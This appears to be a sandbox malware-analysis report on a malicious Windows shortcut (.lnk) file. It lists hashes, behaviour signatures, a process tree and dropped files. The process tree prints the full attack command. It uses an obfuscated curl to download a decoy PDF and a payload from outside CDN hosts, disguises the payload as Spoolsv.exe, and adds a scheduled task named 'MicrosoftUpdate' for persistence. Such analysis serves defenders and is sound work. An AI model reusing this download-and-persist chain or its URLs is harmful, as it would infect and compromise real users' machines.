Overview

overview

7

Static

static

1

6d6dc50e8e...a9.lnk

windows7-x64

3

6d6dc50e8e...a9.lnk

windows10-2004-x64

7

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2024 01:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    6d6dc50e8e73053763f9b85b7c1f1b532ec3023b5b89b3546f0330b4956e75a9.lnk

  • Size

    4KB

  • MD5

    fd49a7937e010acb2c6ed20c22f493f2

  • SHA1

    27f61fdf3989a8f3b67307af8bf669577edbe694

  • SHA256

    6d6dc50e8e73053763f9b85b7c1f1b532ec3023b5b89b3546f0330b4956e75a9

  • SHA512

    65555d2e09defbdc83859416ded4405bc5643e52568013715850b4ad6f0b36cc6cf9eb345d5fccf33e55bb9e37323040c68e3e405225b4a9f3ca05b894a38e47

  • SSDEEP

    96:8EaV7c3Ox9H19sx9WAxaGvwALoj3uSY+JO:8EaV7cerXsrjj4A43hv

Score
7/10
discoveryexecution

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Service Discovery 1 TTPs 1 IoCs

    Adversaries may try to gather information about registered local system services.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\6d6dc50e8e73053763f9b85b7c1f1b532ec3023b5b89b3546f0330b4956e75a9.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3308
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat" ; cmd /c cls & c^url --output C:\ProgramData\Robot_Radiation_Project1.pdf --ssl-no-revoke --url https://huanetdw.c-cdn77.com/grquwy287gdejh39/cfswr523 -s & start C:\ProgramData\Robot_Radiation_Project1.pdf & c^url --output C:\ProgramData\Robot_Radiation_Project.pdf --ssl-no-revoke --url https://huanetdw.c-cdn77.com/grquwy287gdejh39/cfswr523 -s & c^url --output C:\ProgramData\Microsoft\DeviceSync\job --ssl-no-revoke --url https://dugayqwh.c-cdn77.com/fsuwrui8uuoiduefh76435bkow9djl2ryriet/ueworoejvdvhruthqq3 -s & move C:\ProgramData\Robot_Radiation_Project.pdf . & del *.pdf.lnk & cd C:\ProgramData\Microsoft\DeviceSync & rename job Spoolsv.exe & SCHTASKS /CREATE /SC minute /TN MicrosoftUpdate /TR "C:\ProgramData\Microsoft\DeviceSync\Spoolsv" /F "
      2⤵
      • Checks computer location settings
      • System Service Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2516
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "& Import-Module 'C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\..\Pester.psm1'; & { Invoke-Pester -EnableExit ; cmd /c cls}"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3820
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lbcxzcxb\lbcxzcxb.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4296
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES92F9.tmp" "c:\Users\Admin\AppData\Local\Temp\lbcxzcxb\CSCB4A443A99AD3456ABBB548925D5F41.TMP"
            5⤵
              PID:4904
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c cls
            4⤵
              PID:1236
          • C:\Windows\system32\curl.exe
            curl --output C:\ProgramData\Robot_Radiation_Project1.pdf --ssl-no-revoke --url https://huanetdw.c-cdn77.com/grquwy287gdejh39/cfswr523 -s
            3⤵
              PID:2036
            • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
              "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\ProgramData\Robot_Radiation_Project1.pdf"
              3⤵
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Modifies Internet Explorer settings
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:5024
              • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:736
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=C90F4E394A00F5B187A926C8BB4D3210 --mojo-platform-channel-handle=1724 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1040
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=984304CF8634C7C77175F937305681E6 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=984304CF8634C7C77175F937305681E6 --renderer-client-id=2 --mojo-platform-channel-handle=1736 --allow-no-sandbox-job /prefetch:1
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1632
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=23A0F73B1F56ABC3890798D4C7B02A8E --mojo-platform-channel-handle=2264 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:1776
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=792079C741E2A75DD4DE9765246032F6 --mojo-platform-channel-handle=1904 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4004
                • C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=B0E903BDEBFC991980858D1F1B8391B0 --mojo-platform-channel-handle=1896 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4336
            • C:\Windows\system32\curl.exe
              curl --output C:\ProgramData\Robot_Radiation_Project.pdf --ssl-no-revoke --url https://huanetdw.c-cdn77.com/grquwy287gdejh39/cfswr523 -s
              3⤵
                PID:3804
              • C:\Windows\system32\curl.exe
                curl --output C:\ProgramData\Microsoft\DeviceSync\job --ssl-no-revoke --url https://dugayqwh.c-cdn77.com/fsuwrui8uuoiduefh76435bkow9djl2ryriet/ueworoejvdvhruthqq3 -s
                3⤵
                  PID:4244
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /CREATE /SC minute /TN MicrosoftUpdate /TR "C:\ProgramData\Microsoft\DeviceSync\Spoolsv" /F
                  3⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:232
            • C:\Windows\System32\CompPkgSrv.exe
              C:\Windows\System32\CompPkgSrv.exe -Embedding
              1⤵
                PID:2008

              Network

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                Filesize

                64KB

                MD5

                f9868437938781e903576b483d0aeebb

                SHA1

                5cafbb4e5396660be36ce9c8cf0562de14ff3bb3

                SHA256

                a11d79ec2da382c655bc49e8f795fa0eb8ae71086b8e465ad7a9a53658846906

                SHA512

                8fc296dc6ddee51f13783ebc85557fa2bda36fa7c4ca984b69f6b66bb982aed0823ac7cbcc6651947170932ce81eb64a448cc651329506cf243808e957db8e59

                Download Submit

              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                Filesize

                36KB

                MD5

                b30d3becc8731792523d599d949e63f5

                SHA1

                19350257e42d7aee17fb3bf139a9d3adb330fad4

                SHA256

                b1b77e96279ead2b460de3de70e2ea4f5ad1b853598a4e27a5caf3f1a32cc4f3

                SHA512

                523f54895fb07f62b9a5f72c8b62e83d4d9506bda57b183818615f6eb7286e3b9c5a50409bc5c5164867c3ccdeae88aa395ecca6bc7e36d991552f857510792e

                Download Submit

              • C:\Users\Admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages
                Filesize

                56KB

                MD5

                752a1f26b18748311b691c7d8fc20633

                SHA1

                c1f8e83eebc1cc1e9b88c773338eb09ff82ab862

                SHA256

                111dac2948e4cecb10b0d2e10d8afaa663d78d643826b592d6414a1fd77cc131

                SHA512

                a2f5f262faf2c3e9756da94b2c47787ce3a9391b5bd53581578aa9a764449e114836704d6dec4aadc097fed4c818831baa11affa1eb25be2bfad9349bb090fe5

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\RES92F9.tmp
                Filesize

                1KB

                MD5

                c0696c54ffdd2eba80e86f94af95ef97

                SHA1

                cbfe9ac562cdfaf4a83ca6c28c6e328349dee6cd

                SHA256

                f56f5c46b15f8f5f07389c684ba54bb6a55160841a5af87e745f005dc75054c2

                SHA512

                69157aaad044632592d8c6a1428f0c31fd3d08a57b706981e45cf32dc2720cb6f1043212a5093048b68401a002157baac8ef2bde05b1181275f90a80b0976e2b

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b5ppsqz1.5jy.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\lbcxzcxb\lbcxzcxb.dll
                Filesize

                3KB

                MD5

                35cf326b8b6dbdbe8636f66844101707

                SHA1

                8ebc1f01fdb0331ca960d4334bd3974cb20e8914

                SHA256

                769c3546284a2876151a2ae7fd842e9f313f4c59e6a5dc9d8fffab632e043cd8

                SHA512

                2461ea5959e13e43c833d3e6bbf62b12fc2e6da87667681f9f1acae6472ff5714f8f821743872002a2699e9433efc8333928026e6dc2aff01701ddbd8f4330d9

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\lbcxzcxb\CSCB4A443A99AD3456ABBB548925D5F41.TMP
                Filesize

                652B

                MD5

                508dfd99f618c51127f4a81107de0d4c

                SHA1

                8220c572a520406119d217a57a562aed31d5a5a0

                SHA256

                480bfd9f2d687dd9d55a434c1674fb5c7cb2a5ba50147e1d7647be851f864298

                SHA512

                aceb0a670554b7d0d97b0e03f19bf463ac799eaae67025269eee19908f10931c046a58a26e1cec4913772537ec60df0386c8b617d0d2924294a3671e8c4c29e7

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\lbcxzcxb\lbcxzcxb.0.cs
                Filesize

                907B

                MD5

                d98b32865e5bd9376502ce614141b7fa

                SHA1

                673d622933fbdb9aaafaf847c3cb8f1ce4b18cbc

                SHA256

                6d21e15bcaebe4b6461790fbe39381ef6dc736eec19a66e80ee15caf4680fe00

                SHA512

                28f4ec12ba6b47af36e288a81de46ce017144416626c50c4266207f92ac5d4b532691e1ee5a3cf54abc0c567e5cd60fb3d3180e8829cdbfab98013d45377ddb0

                Download Submit

              • \??\c:\Users\Admin\AppData\Local\Temp\lbcxzcxb\lbcxzcxb.cmdline
                Filesize

                369B

                MD5

                8ab74c6dc55fd4e779803b67f01b7f17

                SHA1

                5170645abb21d9fb51a80dd4e5563e22ca7349ac

                SHA256

                27a855cf2d6582e16086f063964ff1cda3cd0213ecc60c0416c31d5455f7993a

                SHA512

                3fbe9e4763c04d2e60b445cb088900fd530c3390b5350b40b67a63fbd9342dc307efcf127546c62923587970679ce475efd74d2a936e1ae114b739e6bf8ce403

                Download Submit

              • memory/3820-0-0x00007FFED4123000-0x00007FFED4125000-memory.dmp

                Filesize

                8KB

                Download

              • memory/3820-13-0x0000022B3B700000-0x0000022B3B72A000-memory.dmp

                Filesize

                168KB

                Download

              • memory/3820-27-0x0000022B3B4A0000-0x0000022B3B4A8000-memory.dmp

                Filesize

                32KB

                Download

              • memory/3820-14-0x0000022B3B700000-0x0000022B3B724000-memory.dmp

                Filesize

                144KB

                Download

              • memory/3820-29-0x00007FFED4120000-0x00007FFED4BE1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3820-32-0x00007FFED4120000-0x00007FFED4BE1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3820-12-0x00007FFED4120000-0x00007FFED4BE1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3820-11-0x00007FFED4120000-0x00007FFED4BE1000-memory.dmp

                Filesize

                10.8MB

                Download

              • memory/3820-1-0x0000022B226D0000-0x0000022B226F2000-memory.dmp

                Filesize

                136KB

                Download